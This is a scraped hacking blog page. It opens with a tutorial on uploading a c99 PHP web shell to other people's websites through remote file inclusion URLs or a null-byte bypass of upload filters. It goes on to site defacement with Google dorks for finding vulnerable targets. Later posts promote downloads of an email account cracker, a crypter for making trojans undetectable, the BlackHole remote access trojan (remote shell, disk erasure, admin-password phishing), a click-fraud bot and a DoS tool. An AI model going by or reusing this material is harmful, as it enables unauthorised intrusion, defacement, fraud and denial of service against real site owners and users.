Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT



#
The c99 shell is almost always used in remote file includes. That means that you get the remote server to 'host' the shell without any needing to upload it to take control over it. Read: RFI
#

#
A remote include works like this:
#

#

A website written in PHP includes files from a local directory. It usually looks something like this in the URL: "http://test.com/index.php?file=whatever" The part after the "?file=" is the locally included file. I'm really not going to get into how the RFI actually works, because it's beyond the scope of this. So, to include the file you would host it locally in a .txt and include it by doing : "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php
#

#
Get it?
#
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)
#

#
Now, what Clover was talking about is using a Null Byte attack. You just upload your shell via an upload form. Because most forms filter out certain extensions uploading .php is almost impossible. With a Null Byte attack though, it's made possible.
#

#

Now, lets take our usual picture upload form. This form filters out extensions such as .exe, .js, .php, .xml and so on and so forth. So if you were to try and upload C:\My Documents\shell.php it would return an error. The Null Byte works around this simple security measure because a Null Byte can be used as a string terminator. In simple terms, it tells the server where the string ends. Now, how it works. As we know, if we try to upload with a .php extension, we get returned an error. If we add a Null Byte to that string, with an acceptable extension we can bypass the extension check of the form. The Null Byte is represented in simple text for as "". So, back to the upload form we go. As we go to upload our shell "C:\My Documents\shell.php" we will add to the end of that a Null Byte along with an extension. Now it looks something like this "C:\My Documents\shell.php.jpg"
#

#

(extra info: Most forms now prohibit the use of special characters such as %,#,@,*,$ just for this reason. Forms now also prevent the clicking in the text area to prevent the addition of string terminators" and the like)
#

#

Now, the problem that I always ran into when I first started using Null Byte attacks was that I could never find where it went. It would upload fine, but I could never actually execute the shell. This was worked around by using HTTPLiveHeaders (firefox addon). Monitoring while I uploaded the shell would give me the exact location of where the file was stored. Copy the destination of the uploaded file and paste into the URL bar and everything would work out from there. Of course, that is if the person doesn't have a script to automatically check the extension again and assign the proper one, or if they use a script to copy, move to another destination, and delete.
#

#

Everyone got it now?
#

#

If all things go according to plan, your shell shall be uploaded and you can now take control.

II)
---
Defacing a Site using a c99 shell
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Quote:inurl:"upload.php"

Quote:inurl:"page=home.html"

Quote:inurl:"news/id="

That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
Quote:http://site.com/page=

On that page= you can put your shell so it would look like
Quote:http://site.com/page=http://geocities.co...13/c99.txt

credits To RiTaLiN


Read More Add your Comment 3 comments


list of online SQLi scanners, Very handy




Read More Add your Comment 7 comments


[Release] Cryptinator - A simple Encryption Application



So today i decided to make a program like the following one i saw earlier.
[Image: 43201152623pm.png]

But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.

Im not sure what you would have use for this, but for me when ever i need a completely random string i will use this now :D prolly for some other things but yea. Hope you guys enjoy it! :D

Cryptinator ScreenShot:
[Image: screenshotzu.png]

Virus Scan
Download


Read More Add your Comment 1 comments


UniCrack v1.0 Beta/Trial [Gmail,Hotmail,Live,Yahoo] Cracker



[Image: unicrack.gif]

UniCrack v1.0 [Download]

[VirusTotal Scan]

VirusTotal Detects 1/41

Ikarus T3.1.1.103.0 2011.04.22 HackTool.Win32.VB.jz

not really sure why ? false positive tho feel free to Sandbox / Virtual Machine your heart out.


Read More Add your Comment 5 comments


[Tool]MD5 Crack Fast



Screenshot:
[Image: WLGnn.jpg]
[Image: ?action=result_img&task_id=192d4...mage=1.png]

Pack Contains :

[]MD5 Crack Fast
Ultimate Distributed Cracker
Last Bit Md5 Password Cracker


Virus Scan - Analysis etc



[Image: D3Vxu.gif]
[Image: download-icon.gif] <--- PRESS THE BOX TO DOWNLOAD!

Please leave feedback/say thanks if you have downloaded it.


Read More Add your Comment 1 comments


iCrypt Err0r Version



his crypter makes ur trojan undetected

Never Upload @ virustotal use only NoVirusThanks.org

[Image: proggy.jpg]

Download



http://www.4shared.com/file/z1KjxfDn/iCr...rsion.html


Read More Add your Comment 0 comments


FREE Online Shell Checker [ Fast ][ VERY Reliable ][ Good for People With Slow Internet]



Hey, so here is an online shell checker

http://hf-alex.com/test/

Please do not click the "submit" button more than once and WAIT for it to load

I have used Curl so it should be fast and reliable

This is made more for reliability more than speed

this scans about 100 links in about 15-25 seconds

Once you see the submit button disappear the scan has finished..

The working urls will be in the box

This is very good for people with slow internet because all the checks are done server-side, that means all you have to do is wait for the checks to be done. The webpage is very small so it doesnt take up much bandwidth at all!
http://hackguide4u.blogspot.com Have fun and please say thanks if you used it :)
http://hackguide4u.blogspot.com


Read More Add your Comment 0 comments


Pre-Release] BlackHole RAT V2 [Test-Version]



Okay.. because some people have asked me "whats up with the next Version?" I will upload a Test-Version of the BlackHole RAT V2.

This Version is a little bit complicated to install and its untested!!

So what can you do with this Version?

- Execute Shell Comands remotly
- Chat with slave
- Read some Text on the slave Computer
- Display a Message
- Erase the HD
- Phish the Admin Password
- Block the Activity Monitor (after succsessfully phished Admin Pass)
- Shutdown, Reboot, Sleep and kill the Finder.app


What does this Version do?

- Adds itself to the Startup Items
- Is at the moment FUD
- Hidden From Dock, runs in background


What are the known Problems?

- Installation is a little bit complicated
- Server opens many Ports
- On every boot there will pop up a Window


Known Bugs?

- Server crashes when closing the Chat
- iSight Photo is not send complete
- ScreenShot function does not work in this Version


Okay now You know that all.. but this is only to show you what you can do with this on a Mac Computer. I will try to fix all Bugs and Problems as fast as I can.

Installation:

1. Start the Install.command
2. Drag&Drop the Files asked in the Terminal Window
3. After Installation finished, close the Terminal and reboot
4. Connect with the Client


To use the Block Activity Window Function, do this:

1. Open the Block Script with Apple-ScriptEditor
2. Enter the slave Admin Pass where it says "enteradminpasswordhere"
3. Save as Programm named "Block"
4. Copy to /Applications/JavaUpdater/Data/Block.app on the Victims Computer
5. Now you can use the Block function with the Client


I hope you will like this.Thumbsup

Note: The Client works on Windows AND Mac.

Here are some pics:



And here is the Total Virus scan:


I hope you will like it;)

Downloadlink: http://www.mediafire.com/?3nzk25p2jz8gjd1


Read More Add your Comment 0 comments


Youtube Link-bucks click increaser - [2000+ REAL clicks]



The view increaser feature in my youtube bot doesn't work as well as it use to ever since youtube's recent updates so i tested how well it would work on link-bucks and it makes 2000+ clicks per day, think i should add a link-bucks clicker feature to my bot? is 2000+ clicks any good?

[Image: logo_4.jpg]


Read More Add your Comment 2 comments


TeV DoS Tool | Easy DoS



This easy DoS tool was made by Elixed_ in java.
Direct download: https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar
Mirrors:

Virus scan: http://vscan.novirusthanks.org/analysis/...zLWV4ZQ==/

No idea why that moron virus scanner says that its a virus lol.

Created this almost a year ago, just found it at my old laptop and was like, why not post on HF.


It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.
http://www.downforeveryoneorjustme.com/


For the people that really wants a screen:


Read More Add your Comment 0 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com